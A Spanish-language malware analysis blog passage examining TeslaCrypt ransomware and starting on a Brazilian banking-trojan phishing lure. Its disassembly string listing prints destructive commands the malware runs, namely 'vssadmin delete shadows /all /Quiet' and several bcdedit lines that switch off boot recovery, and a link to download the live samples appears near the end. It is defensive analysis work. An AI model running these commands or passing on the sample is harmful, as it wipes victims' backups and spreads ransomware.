<span style="font-family: inherit;">Desempacado del malware.</span></div>
<div class="separator" style="clear: both; font-family: Arial, Helvetica, sans-serif; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; font-family: Arial, Helvetica, sans-serif; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLo_gRELZAtYIJI_L5nRqvIl2ety_G8z__1sDHAcHAGzhf7nHMdrnWvfwBpFTKqBOnu3wodzqM-8apa9M4e3vlg0HRyq5pXpMoctq2hcmrreOjLuI_tRWOI06rwOzGHoI1JQ9Lq-_h-YM/s1600/BP1.png" imageanchor="1"><img border="0" height="126" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLo_gRELZAtYIJI_L5nRqvIl2ety_G8z__1sDHAcHAGzhf7nHMdrnWvfwBpFTKqBOnu3wodzqM-8apa9M4e3vlg0HRyq5pXpMoctq2hcmrreOjLuI_tRWOI06rwOzGHoI1JQ9Lq-_h-YM/s320/BP1.png" width="320" /></a></div>
<div class="separator" style="clear: both; font-family: Arial, Helvetica, sans-serif; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; font-family: Arial, Helvetica, sans-serif; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdpSAeI_zuh9lm82t5ByVCd8O1lvDQ3pw44qP4aXB6AH7HIbqIUMmPkQvt8YdPgl3RGqMnnJO_4I7dUzsapDEt_rBSfYnMsADoRo-WFz10DsMNw2zku8kbi7Ca3qE5NyhYOAGDAfV30-I/s1600/BP0.png" imageanchor="1"><img border="0" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdpSAeI_zuh9lm82t5ByVCd8O1lvDQ3pw44qP4aXB6AH7HIbqIUMmPkQvt8YdPgl3RGqMnnJO_4I7dUzsapDEt_rBSfYnMsADoRo-WFz10DsMNw2zku8kbi7Ca3qE5NyhYOAGDAfV30-I/s320/BP0.png" width="320" /></a></div>
<div class="separator" style="clear: both; font-family: Arial, Helvetica, sans-serif; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><b><br /></b></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: inherit;"><b>Strings Interesantes</b></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">Address Disassembly Text string</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0040103B PUSH dump.004322C8 UNICODE "Software\%s"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0040108A PUSH dump.004322E0 UNICODE "data"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0040111F PUSH dump.004322EC ASCII "Software\%S"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">00401142 PUSH dump.004322F8 ASCII "S-1-5-18\"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">004011DB PUSH dump.00432304 ASCII "data"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">00401280 PUSH dump.0043230C UNICODE "\S-1-5-18\Software\zsys\"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">004012AC PUSH dump.00432340 UNICODE "ID"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">004012DC PUSH dump.00432348 UNICODE "%X%X%X%X"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">00401313 PUSH dump.00432348 UNICODE "%X%X%X%X"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">00401368 PUSH dump.0043235C UNICODE "Software\zsys\"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">00401386 PUSH dump.00432340 UNICODE "ID"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">004013C6 PUSH dump.00432340 UNICODE "ID"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">004013FC PUSH dump.00432348 UNICODE "%X%X%X%X"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">00401433 PUSH dump.00432348 UNICODE "%X%X%X%X"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">00412BAE PUSH dump.00438194 ASCII "sdflk35jghs"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">00412BD1 MOV DWORD PTR SS:[EBP-6C],dump.00438194 ASCII "sdflk35jghs"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">00412F99 MOV ESI,dump.00432EF0 ASCII ".dll"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041373F PUSH dump.00433010 UNICODE "how_recover"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041374B PUSH dump.00433028 UNICODE "%s\%s+%s.txt"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">004137A7 PUSH dump.00433010 UNICODE "how_recover"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">004137B3 PUSH dump.00433044 UNICODE "%s\%s+%s.html"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">00413975 ASCII "Qh",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">004139E0 MOV ECX,dump.00433060 UNICODE "A:\"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">00413A30 MOV ECX,dump.00433068 UNICODE "B:\"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">00413C10 PUSH dump.00433070 UNICODE "\*.*"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">00413C9F MOV EAX,dump.00433080 UNICODE ".."</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">00413EBD MOV EAX,dump.00433088 UNICODE "recove"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">00413ECD MOV EAX,dump.00433098 UNICODE ".vvv"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">00413FF0 PUSH dump.00433098 UNICODE ".vvv"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041A306 PUSH dump.0043312C ASCII "Cr"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041A31D PUSH dump.00433130 ASCII "ypted"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041A381 PUSH dump.004330E0 ASCII "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041A4E7 PUSH dump.004324AC ASCII "2.2.0"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041A6F8 PUSH dump.00433138 ASCII "%s?%s"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041A744 PUSH dump.00433140 ASCII "GET"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041A7B8 PUSH dump.00433144 ASCII "INSERTED"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041A85C PUSH dump.004330E0 ASCII "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; </span><span style="font-family: 'Courier New', Courier, monospace; font-size: xx-small;">Touch; rv:11.0) like Gecko"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace;">0041A874 PUSH dump.00433150 UNICODE "http://myexternalip.com/raw"</span></div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><br /></span></div>
</span><span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041D688 PUSH dump.004380F4 UNICODE "%s\system32\cmd.exe"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041D75E MOV DWORD PTR SS:[EBP-854],dump.0043813C UNICODE "runas"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041D82D PUSH dump.00438148 ASCII "vssa"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041D843 PUSH dump.00438150 ASCII "dmin"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041D859 PUSH dump.00438158 ASCII ".exe"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041D881 PUSH dump.00438160 ASCII "delete "</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041D897 PUSH dump.00438168 ASCII "shadows "</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041D8B0 PUSH dump.00438174 ASCII "/all "</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041D8C6 PUSH dump.0043817C ASCII "/Quiet "</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041D8F8 MOV DWORD PTR SS:[EBP-23C],dump.00438184 ASCII "open"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041D90A MOV DWORD PTR SS:[EBP-23C],dump.0043818C ASCII "runas"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041DAFD PUSH dump.004335E8 ASCII "Qwi+Z2ptKhg884OCgBjab+QQ1zaBfozWc6txcHgkc6+AEn1w8gFPofQSOA7x8Y=="</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041DB1D PUSH dump.00433598 ASCII "xqTHKxhHf5KXoX/eFiktjVyAZ6uGJ2BLl7SzVC2ueVDnONLTeN2Q0HW7rmeSlcHFEnI12UrR"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041DB40 PUSH dump.00433550 ASCII "FSVvmBCBk7wMEoif5nZjWH2tFlEkUQwgKwPy/04w8E/WLQlp4ogUohBlNgZ9YQ=="</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041DB62 PUSH dump.00433508 ASCII "l2Hd+QlQKxTunawJxW1JslefFsEIYc79d+JZDiPXpj3qNRCiQgVitrCMwwlKju=="</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041DB82 PUSH dump.004334B8 ASCII "F2UeThCgQBrhu5kWIiCOhuvLGNBAhWdhD5T4Ukihd+Jaq26PBSLnxjMN0BHbDtJYoZKoigO5"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041DBA6 PUSH dump.00433468 ASCII "5p32jJULMx6o6X1+OfAh17uh5oGV9Czt8RLgjANQsmmmqxopIg/vQdShWSchJi9IpKlrPXAb"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041DBCC PUSH dump.00433420 ASCII "6hZ3J2jHDTP8JtXjBjr+wNn+4a/uKzK1vyouD8qyHswLsR7E9X2Wf9SgwAlRna=="</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041DF89 PUSH dump.004381CC ASCII "Wow64DisableWow64FsRedirection"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041DF91 PUSH dump.004381EC ASCII "Wow64RevertWow64FsRedirection"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041DFE1 PUSH dump.0043820C UNICODE "\recover_file_"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041E012 PUSH dump.0043822C UNICODE ".txt"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041E07F PUSH dump.00438238 UNICODE ":Zone.Identifier"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041E0AE PUSH dump.0043825C ASCII "SeDebugPrivilege"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041E16B PUSH dump.00438270 UNICODE "2134-1234-1324-2134-1324-2134"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041E1EF PUSH dump.004382AC ASCII "bcdedit.exe /set {current} bootems off"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041E1FC PUSH dump.004382D4 ASCII "bcdedit.exe /set {current} advancedoptions off"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041E209 PUSH dump.00438304 ASCII "bcdedit.exe /set {current} optionsedit off"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041E216 PUSH dump.00438330 ASCII "bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">0041E223 PUSH dump.00438370 ASCII "bcdedit.exe /set {current} recoveryenabled off"</span><br />
<br />
<br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: xx-small;">0041E454 PUSH dump.004383B8 UNICODE "%s\Howto_RESTORE_FILES.txt"</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: xx-small;">0041E48F PUSH dump.004383FC UNICODE "%s\Howto_RESTORE_FILES.html"</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: xx-small;">0041E4C3 PUSH dump.00438434 UNICODE "%s\Howto_RESTORE_FILES.bmp"</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: xx-small;">0041E78B PUSH dump.0043846C UNICODE "%s\%s"</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: xx-small;">0041E7E3 PUSH dump.00438478 UNICODE "%s\%sacroic.exe"</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: xx-small;">0041E904 PUSH dump.00438498 UNICODE "/c "</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: xx-small;">0041E91A PUSH dump.004384A0 UNICODE "DE"</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: xx-small;">0041E930 PUSH dump.004384A8 UNICODE "L "</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: xx-small;">0041E97B PUSH dump.004384B0 UNICODE "ComSpec"</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: xx-small;">0041E9EE PUSH dump.004384C0 ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: xx-small;">0041EA12 PUSH dump.004384FC UNICODE "EnableLinkedConnections"</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: xx-small;">0041EA58 PUSH dump.004333C0 UNICODE "Software\Microsoft\Windows\CurrentVersion\Run"</span><br />
<br />
<b>El troyano verifica la IP de la victima con el siguiente servicio</b><br />
"http://myexternalip.com/raw"<br />
<br />
<br />
Trafico.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiNb1kqVK8PXLlFx58Gx0KwqWDKhLUoQU5S9k8ErjXof2d7sXw4zbiA-3K1lL-2GvLyZx4WHFVjjNVj5AMN044dEh73JOUFsTX8CF09ccVyLOg6In8vfOUvLtU9YfigdU2V610zHmec9k/s1600/comunicacion.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="324" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiNb1kqVK8PXLlFx58Gx0KwqWDKhLUoQU5S9k8ErjXof2d7sXw4zbiA-3K1lL-2GvLyZx4WHFVjjNVj5AMN044dEh73JOUFsTX8CF09ccVyLOg6In8vfOUvLtU9YfigdU2V610zHmec9k/s640/comunicacion.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Luego de ofuscar los datos se despliega este html</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgi9c46lteY_atZm8rgdrcaxHdm70dMbvo249MPVSS9fNuVzi7iV-vI4XkSa3qs63Y8ono2v-MRA8gY9QOL6kFoC_2mWLB4ZCVGjJIuvtp_jecVtrLGuR57rCEGvy5A_TQ3nWWuEcTYhI/s1600/Clipboard02.png" imageanchor="1"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgi9c46lteY_atZm8rgdrcaxHdm70dMbvo249MPVSS9fNuVzi7iV-vI4XkSa3qs63Y8ono2v-MRA8gY9QOL6kFoC_2mWLB4ZCVGjJIuvtp_jecVtrLGuR57rCEGvy5A_TQ3nWWuEcTYhI/s320/Clipboard02.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigFOWva3JANJY1QR-ZCzcRW6HB8vhOOkCcKm4A8QAflRD_kWwXg74K3azQPTXkyGX9D8i_XITVJCXRL1tnHRpZN4mQ-34gpaOMLVqVQ-P96vxefWEBPx9Q3zU_pLjlJ0seu-nAM05DXjo/s1600/Clipboard03-b.png" imageanchor="1"><img border="0" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigFOWva3JANJY1QR-ZCzcRW6HB8vhOOkCcKm4A8QAflRD_kWwXg74K3azQPTXkyGX9D8i_XITVJCXRL1tnHRpZN4mQ-34gpaOMLVqVQ-P96vxefWEBPx9Q3zU_pLjlJ0seu-nAM05DXjo/s320/Clipboard03-b.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Entramos a la web que se nos indica y vemos la exigencia del pago de u$s 500 o 1.15 BTC</div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhSRowhaU0PJRERb-pSbwUcxI_HM7F2t8nuxHdW3ZlRLwscht6K1M-Vhb7DyRKwM-HaahbR4LFzT3Vd4K8NG-z2V87dPg_oZsmkTcfK-yc3qYzdrLuLE1mIBwhypRltF9k7n9FzrSsRg0/s1600/p00.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhSRowhaU0PJRERb-pSbwUcxI_HM7F2t8nuxHdW3ZlRLwscht6K1M-Vhb7DyRKwM-HaahbR4LFzT3Vd4K8NG-z2V87dPg_oZsmkTcfK-yc3qYzdrLuLE1mIBwhypRltF9k7n9FzrSsRg0/s320/p00.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglrXOKxYUYNTsFhGsqOPRWg10kAoP5S_HTP5_PjEn36MT3dtXXuW3qiEWqNmqXWDarSChJCLUFCE7EkwezA6_DF0cdu6ADHLaXAe7iu_tFnHLQDrYpf0ad2FHKpMmhmUK6DhSNNuY7zoc/s1600/p01.png" imageanchor="1"><img border="0" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglrXOKxYUYNTsFhGsqOPRWg10kAoP5S_HTP5_PjEn36MT3dtXXuW3qiEWqNmqXWDarSChJCLUFCE7EkwezA6_DF0cdu6ADHLaXAe7iu_tFnHLQDrYpf0ad2FHKpMmhmUK6DhSNNuY7zoc/s320/p01.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpWUQGVlVNt6XvJY1sOIW2IGrBE8VBFE7LGY9jZ3OS5GwaYETd_hGBtLxzYxfZS-qxkjRal-WkACI1-nhuJFEqR916D6mre12v8pUyDmD8sh8x2z4sz0qMO0ZN3UuEW3gHCqvDYzNLPO0/s1600/p03.png" imageanchor="1"><img border="0" height="94" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpWUQGVlVNt6XvJY1sOIW2IGrBE8VBFE7LGY9jZ3OS5GwaYETd_hGBtLxzYxfZS-qxkjRal-WkACI1-nhuJFEqR916D6mre12v8pUyDmD8sh8x2z4sz0qMO0ZN3UuEW3gHCqvDYzNLPO0/s320/p03.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
La recomendación es no abrir correos no solicitados y mucho menos abrir los adjuntos, y como siempre reforzar las campañas de concientización.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Muestras: https://www.dropbox.com/s/qthkfjoodar7tct/TeslaCrypt-09-12-15.rar?dl=0</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Eso es todo por el momento.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
@Dkavalanche 2015</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<br />
<br /></div>
</div>
@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com2tag:blogger.com,1999:blog-4220472203730425546.post-38070124392638456432015-06-11T05:48:00.000-07:002015-06-11T05:50:20.315-07:00<span style="background-color: #fefdfa; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18.2000007629395px;"><b><span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 18.2000007629395px;">Falsa Intimación :</span><span style="line-height: 18.2000007629395px;"> </span></span></b></span><span style="color: #444444; font-family: 'Courier New', Courier, monospace; line-height: 29.9904003143311px;">Prezado(a) Cliente: Notificao de Intimacoes (10962)</span><br />
<span style="background-color: #fefdfa; color: #444444; font-family: 'Segoe UI Light', 'Segoe UI Web Light', 'Segoe UI Web Regular', 'Segoe UI', 'Segoe UI Symbol', HelveticaNeue-Light, 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 29.9904003143311px;"></span><span style="background-color: #fefdfa;"><span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px; line-height: 18.2000007629395px;">Hoy les traigo una amenaza que ataca a varias entidades bancarias de Brasil, llega como una falsa intimación del </span></span></span><span style="background-color: #f5f8fa; color: #292f33; font-family: Arial, sans-serif; font-size: 16px; line-height: 22px; white-space: pre-wrap;">AASP :: Associação dos Advogados de São Paulo.</span><br />
<br />
Amenaza:<br />
<span style="background-color: #f5f8fa; line-height: 22px; white-space: pre-wrap;"><span style="color: #292f33; font-family: Arial, sans-serif;">http://urlquery.net/report.php?id=1433860235433
http://urlquery.net/report.php?id=1433860235433</span></span><br />
<span style="background-color: #f5f8fa; line-height: 22px; white-space: pre-wrap;"><span style="color: #292f33; font-family: Arial, sans-serif;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG3y6Sa8vVfHMDm2UO6AER8LWibBMuh66cxX15Nu2pAY8nX7h9xyqzxbNlX0GNhwf6-pcYlNEUaBgb2lZ4NM60c-Qp9xcPyop2YrfABp8HLokhU3R0Fy86jaEg6r5k3Ek8RNGSLZP-LQc/s1600/spam.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="398" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG3y6Sa8vVfHMDm2UO6AER8LWibBMuh66cxX15Nu2pAY8nX7h9xyqzxbNlX0GNhwf6-pcYlNEUaBgb2lZ4NM60c-Qp9xcPyop2YrfABp8HLokhU3R0Fy86jaEg6r5k3Ek8RNGSLZP-LQc/s640/spam.jpg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Analisis en VT con un indice casi nulo de detecciones. 2/57</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHVgyrxA6JGk3jOC6UfuT_-wYbpMnZkreokux-d3h0vuIWk9fnlocYd8fiudqHPo_xATLia0XJryOS-U7TN-jYnPbqVtI4pREmwE6CMFoMaLgRDSaISXOpNZ8Q6L9a4P-Q8VURGCcmz9w/s1600/vt.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHVgyrxA6JGk3jOC6UfuT_-wYbpMnZkreokux-d3h0vuIWk9fnlocYd8fiudqHPo_xATLia0XJryOS-U7TN-jYnPbqVtI4pREmwE6CMFoMaLgRDSaISXOpNZ8Q6L9a4P-Q8VURGCcmz9w/s320/vt.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Contiene una capa de ofuscación con un cripter en VBasic que se quita fácilmente aplicando un BP en IsDebbugerPresent y en WriteProcessMemory para volcar el dump</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">El Dropper descarga otra amenaza desde otro sitio, el url se encuentra codificado.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZGUI1Ojo4b_CsV-8lb_CSXC1Jn3vigDT6O6bLQLCpmFreZ1vqMpAUL3gsehPTC80YaDDXJ6GRlDpksgJOiDRozAHFflZc3PR2-mNOZOGe1YS4totUyrwcfSVtXeeNMXNcNi-ydaxbb80/s1600/06.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="82" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZGUI1Ojo4b_CsV-8lb_CSXC1Jn3vigDT6O6bLQLCpmFreZ1vqMpAUL3gsehPTC80YaDDXJ6GRlDpksgJOiDRozAHFflZc3PR2-mNOZOGe1YS4totUyrwcfSVtXeeNMXNcNi-ydaxbb80/s640/06.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoejmWju4spJbEYQZ9a1Rges5U9ak4R6hltevKWLZXduWWcRWHvps2XrBT0yh6RORiuf12duMGEposV_BfQz2k9oTmRFXKH6aMpo-LlZpkunrF9DNaxY1mfqOUifCqaBLG-VzqCylHS4g/s1600/01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoejmWju4spJbEYQZ9a1Rges5U9ak4R6hltevKWLZXduWWcRWHvps2XrBT0yh6RORiuf12duMGEposV_BfQz2k9oTmRFXKH6aMpo-LlZpkunrF9DNaxY1mfqOUifCqaBLG-VzqCylHS4g/s640/01.png" width="640" /></a></div>
